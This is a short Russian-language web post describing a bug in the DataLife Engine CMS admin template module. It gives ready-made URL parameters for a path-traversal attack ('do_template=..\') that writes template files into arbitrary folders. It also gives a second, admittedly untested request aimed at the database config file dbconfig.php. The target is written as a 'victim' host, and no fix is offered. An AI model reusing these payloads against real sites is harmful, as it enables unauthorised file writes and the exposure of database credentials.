Регистрация

Баг - прямой вызов файлов и мусор в папках

TipTop 9-06-2010, 08:31 3201 Разное

Баг - прямой вызов файлов и мусор в папках

Данный баг позволяет производить прямой запуск файлов и мусорить в папках

DataLife Engine уязвимость работает на версиях: ВСЕ DataLife Engine

Уровень риска: Низкая (На данный момент, работает только если у пользователя есть права администратора)

Автор: Lion__

Переходим по ссылке:
http://жертва/admin.php?mod=templates
Получаем юрл с хешем, дописываем:

Если вам надо расподить файлы шаблона в нужную папку:
&action=dosavetemplates&edit_main=Bag_By_Lion__&do_template=..\



Прямой запуск файлов (пример запуска dbconfig.php):
&action=dosavetemplates&do_template=..\engine/data/dbconfig.phP -a=



Внимание: Второй способ не тестировался, но должен работать, защиту вроде обходит

Другие публикации по категории:

Проведение атаки межсайтового скриптинга (XSS)

Сжатие CSS файлов шаблона в DLE

Статья Оптимизирем запросы поиска по DLE сайту

Повышение системных требований DataLife Engine

Статья оптимизируем под SEO сайт на DLE


Комментарии (1)

avatar
#1 Whisper
а исправить то как ?
Информация
Посетители, находящиеся в группе Гости, не могут оставлять комментарии к данной публикации.
Powered by Dleshka.org. Сайт предназначен для выбора шаблонов и дополнений с использованием CMS DataLife Engine.
Закрыть